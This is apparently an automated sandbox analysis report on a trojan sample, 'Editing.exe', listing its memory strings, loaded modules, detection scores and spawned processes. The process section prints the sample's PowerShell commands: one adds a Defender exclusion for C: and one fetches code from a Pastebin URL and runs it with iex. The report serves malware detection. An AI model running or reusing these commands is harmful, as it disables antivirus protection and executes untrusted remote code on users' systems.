Source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Editing.exe
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@14/17@4/5
Source: C:\Users\user\Desktop\ Editing.exeFile created: C:\Users\user\AppData\Roaming\notification_sent.flagJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2fdftab.pml.ps1Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Editing.exeReversingLabs: Detection: 51%
Source: Editing.exeVirustotal: Detection: 50%
Source: Editing.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: Editing.exeString found in binary or memory: Morph - Structs/AddrExp
Source: Editing.exeString found in binary or memory: @0x%x with loopPre-importprejittail.call and not BBINSTRExpand patchpointsPost-importImportationIndirect call transformProfile incorporationMorph - InitProfile instrumentation prepProfile instrumentationAllocate ObjectsRemove empty tryMorph - InliningMorph - Add internal blocksClone finallyUpdate finally target flagsRemove empty finallyMerge callfinally chainsEarly livenessPhysical promotionUpdate flow graph early passMorph - Structs/AddrExpMorph - ByRefsMorph - Promote StructsForward SubstitutionIdentify candidates for implicit byref copy omissionGS CookieCompute edge weights (1, false)Morph - GlobalMorph - FinishMerge throw blocksInvert loopsCreate EH funcletsTail mergeOptimize layoutCompute blocks reachabilityPost-morph tail mergeOptimize control flowFind loopsClone loopsSet block weightsRedundant zero InitsMorph array opsHoist loop codeUnroll loopsClear loop infoFind oper orderSet block orderMark local varsOptimize boolsSSA: Doms1SSA: livenessBuild SSA representationSSA: topological sortSSA: renameEarly Value PropagationSSA: DFSSA: insert phisOptimize Valnum CSEsVN based copy propDo value numberingOptimize index checksAssertion propIf conversionVN based intrinsic expansionRedundant branch optsCompute edge weights (2, false)Stress gtSplitTreeVN-based dead store removalUpdate flow graph opt passExpand TLS accessInsert GC PollsExpand runtime lookupsExpand static initDo 'simple' loweringLocal var livenessDetermine first cold blockRationalize IRGlobal local var livenessLowering decompositionLocal var liveness initPer block local var livenessLinear scan register allocLSRA build intervalsLowering nodeinfoCalculate stack level slotsPlace 'align' instructionsGenerate codeLSRA allocateLSRA resolvePost-EmitEmit codeEmit GC+EH tablesProcessor does not have a high-frequency timer.
Source: Editing.exeString found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--depsfilePath containing probing policy and assemblies to probe for.<path>--additionalprobingpath--fx-versionPath to <application>.runtimeconfig.json file.--runtimeconfigPath to <application>.deps.json file.<value>--roll-forwardVersion of the installed Shared Framework to use to run the application.<version>--roll-forward-on-no-candidate-fxPath to additional deps.json file.--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)Parsed known arg %s = %ssdk<obsolete><n>Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute. %s %-*s %sFailed to parse supported options or their values:--- Executing in split/FX mode...The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.staticexec--- Executing in muxer mode...--- Executing in a native executable mode...
Source: Editing.exeString found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: Editing.exeString found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: unknownProcess created: C:\Users\user\Desktop\ Editing.exe "C:\Users\user\Desktop\ Editing.exe"
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP"
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP"Jump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: wshunix.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\ Editing.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
